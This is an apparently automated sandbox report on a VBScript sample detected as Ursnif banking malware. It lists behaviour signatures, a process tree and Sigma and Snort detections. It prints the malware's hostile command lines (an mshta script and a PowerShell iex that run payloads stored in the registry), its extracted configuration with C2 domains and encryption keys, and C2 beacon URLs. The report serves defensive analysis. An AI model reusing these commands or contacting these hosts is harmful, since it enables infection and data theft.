Loading ...

Play interactive tourEdit tour

Windows Analysis Report sample.vbs

Overview

General Information

Sample Name:sample.vbs
Analysis ID:481106
MD5:1dd89d4f6390f3dc46486ae6ee57bbf1
SHA1:1be7d12e55659bdd87c34eb24d7d4adf0b68a2c5
SHA256:801e42662653db4f680b49833f5ee0a48124aa814dd4178be1f948f4a8a68b07
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3520 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 2152 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 3540 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 6704 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5764 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • WmiPrvSE.exe (PID: 5388 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 2272 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 3860 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5104 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4936 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5424 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2424 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7052 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
      00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.3.rundll32.exe.527a4a0.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
              18.3.rundll32.exe.527a4a0.1.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                18.3.rundll32.exe.5328d48.2.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                  18.3.rundll32.exe.52f94a0.3.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Encoded IEXShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104
                    Sigma detected: MSHTA Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104
                    Sigma detected: Mshta Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104
                    Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5104, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline', ProcessId: 4936
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104
                    Sigma detected: T1086 PowerShell ExecutionShow sources
                    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132757712350851215.5104.DefaultAppDomain.powershell

                    Data Obfuscation:

                    barindex
                    Sigma detected: Powershell run code from registryShow sources
                    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 5104

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 00000012.00000003.755921050.0000000000AE0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                    Antivirus detection for URL or domainShow sources
                    Source: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/Avira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/dAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/rAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oWAvira URL Cloud: Label: malware
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: atl.bigbigpoppa.comVirustotal: Detection: 8%Perma Link
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_00F23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdbXP=a source: powershell.exe, 00000016.00000002.885459267.00000200B1696000.00000004.00000001.sdmp
                    Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.540443568.000001C497429000.00000004.00000001.sdmp, fum.cpp.0.dr
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdbXP=a source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05741577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_057314A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05746E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_05751802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49818 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49818 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49819 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49819 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49820 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49820 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49821 -> 185.251.90.253:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49821 -> 185.251.90.253:80
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80
                    Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
                    Source: Joe Sandbox ViewIP Address: 185.251.90.253 185.251.90.253
                    Source: global trafficHTTP traffic detected: GET /LZpNlL8ctf0/9G8k9mmuTSS5tz/8E5AsgXcbJMRL1oRInDsm/26uAVe_2F5ldrkH0/uiu44euzNQd9TRf/1Zb3P4q5F0mc0qdltC/bLlV5uCsx/obqe2ve9g7Th5DnAa17u/ifRiDnyBBWyxfspwjbc/4e64zsAjWvHHh07WM2IgYy/t1JnmxqkM0edm/B_2Fp0Xl/aO6EV9JJQOgg5QsFoCbzQfO/_2BOZLcUIR/ooMrpCxMndVWwPntp/mvRIBZb_2B_2/Beg4_2F_2Fr/I_2FcfrvgLZ_2F/J3NCkzqZf5_2Fr1C_2BZp/h9SFOIo1qkmT8Tal/3qdDBO5XKEdw_2F/4xqo8eXRx/pJscFz7Rq/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /yycLCxNRZEFU2J4UrQOl/FX7uF3nnSEu1rXBTN4d/LylqoAvPuubQ7SHiRZfBKF/4dapCnHjf6OGO/yl6rivKE/fgvQJKMe8TaTP5ycHGNAJUS/0YTRa2nWMo/en2LMiL2tQIZKUpol/smZ_2B4BmeyI/57ObWaf9NZW/uHAXXMRRQnyL7K/pZ21NZyhAYoU6jMX_2FXx/_2F1viwpW6B_2BQx/yytF1Qgt5sD6QuY/yCiBnG89B2zLl6ouYK/ovFfokaNC/WnbbXZP7gD7mtpGqOSST/2_2Fq_2BjMeuOfq6Yo5/TugSOTNVmBx8AK0VzEQO9D/fxXdG0idPk4t/207vRTOEh/oW HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /HIIzq4V5S2buP7HU_2F/DcYCSfdPvqaYNdJRMij7gI/5MXe0SZWrBJ2g/js7YCX8y/fDLeVNWGS38iu6HBSu0eZQC/bmSTwgO68w/mDzLSD0yv5NsCWUYa/KrMPefIXTo7Y/kYocGyKbfHI/qpROOMC7W3BpuS/FiHxn9Vj_2BE_2BRO1MPS/HSvVFR_2FvFubdta/FMJR0bw3OFOckhz/gihVzVqSiIHGsYLcl_/2FiUzDnO5/Znp2qHqDPmJt_2FKhKU2/B1dWx_2FKsmf5DpcS8Z/eu7lOAGu9ogHBSfDIGfPdL/lCnFrX6yLs9rJ/djJKkMKB/PGYeMNf7nd3nwYWaABiF0QM/d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
